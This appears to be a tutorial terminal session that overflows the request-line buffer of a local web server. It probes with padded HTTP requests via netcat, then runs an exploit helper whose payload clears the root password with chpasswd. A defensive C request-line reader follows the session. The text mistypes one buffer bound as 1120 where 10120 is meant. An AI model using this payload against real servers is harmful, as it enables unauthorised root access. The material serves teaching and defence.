duesentrieb:~$ printf '%-*s\n\n' 1000 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok
...

duesentrieb:~$ printf '%-*s\n\n' 10000 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok
...

duesentrieb:~$ printf '%-*s\n\n' 20000 'GET / HTTP/1.0' | ./netcat localhost 80

[ ... ]

duesentrieb:~$ printf '%-*s\n\n' 10116 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok
...

duesentrieb:~$ printf '%-*s\n\n' 10120 'GET / HTTP/1.0' | ./netcat localhost 80
Ok - so let's exploit it:
duesentrieb:~$ ./prog2b 5000 6000 5000 0xbffffabc 8000 \
    'echo root: | /usr/sbin/chpasswd -e' | \
    ./netcat localhost 80
duesentrieb:~$ su -
Password:

Hmm - that didn't work. Probably the 10120 bytes "buffer size" is not the size of the buffer but the end of the stack instead, so the server segfaults before it is able to return from the function and execute our code. In that case the output is generated before the function returns, which is why we still see something even when we write past the end of our stack frame. That's bad, because now we don't know how big the buffer is. All we know is that it is smaller than 1120 bytes. Let's try it with a value suitable for a 10000 byte buffer:
duesentrieb:~$ ./prog2b 5000 5000 5000 0xbffffabc 8000 \
    'echo root: | /usr/sbin/chpasswd -e' | \
    ./netcat localhost 80
duesentrieb:~$ su -
duesentrieb:~#

Now we are root ...
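The crash at a fixed request-line length is the symptom of a server copying the request line into a fixed-size stack buffer without a bound. As an added example (not code from this page or from the server it targets), here is the shape of a bounded request-line reader that refuses over-long lines with a 414 status instead of writing past the buffer; the 8190-byte limit, the function names and the probe builder are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limit on a request line (Apache's default LimitRequestLine). */
#define MAX_REQUEST_LINE 8190

enum req_status { REQ_OK = 200, REQ_MALFORMED = 400, REQ_TOO_LONG = 414 };

/* Copy the first line of `in` (up to, not including, CR or LF) into `out`,
 * which holds `outsize` bytes. Never writes more than outsize-1 bytes plus
 * the terminating NUL, however long the client's line is. */
enum req_status read_request_line(const char *in, size_t inlen,
                                  char *out, size_t outsize)
{
    size_t n = 0;
    if (outsize == 0) return REQ_MALFORMED;
    while (n < inlen && in[n] != '\r' && in[n] != '\n') {
        if (n + 1 >= outsize)          /* room for the NUL must remain */
            return REQ_TOO_LONG;       /* refuse before copying one byte more */
        out[n] = in[n];
        n++;
    }
    out[n] = '\0';
    if (n == inlen) return REQ_MALFORMED;          /* no line terminator seen */
    if (strstr(out, " HTTP/") == NULL) return REQ_MALFORMED;  /* no version */
    return REQ_OK;
}

/* Constructed input: the same padded probe the page sends with
 * printf '%-*s\n\n' (request line left-justified in `width` bytes). */
static char probe[16384];

/* Feed a probe of `width` bytes through a MAX_REQUEST_LINE+1 byte buffer
 * and return the status the server would answer with (-1: bad width). */
int probe_status(size_t width)
{
    const char *line = "GET / HTTP/1.0";
    size_t len = strlen(line);
    char buf[MAX_REQUEST_LINE + 1];
    if (width < len || width + 3 > sizeof probe) return -1;
    memcpy(probe, line, len);
    memset(probe + len, ' ', width - len);
    memcpy(probe + width, "\n\n", 3);
    return (int)read_request_line(probe, width + 2, buf, sizeof buf);
}
```

With the limit in place the 10116- and 10120-byte probes from the session above are both answered with 414 rather than reaching the stack.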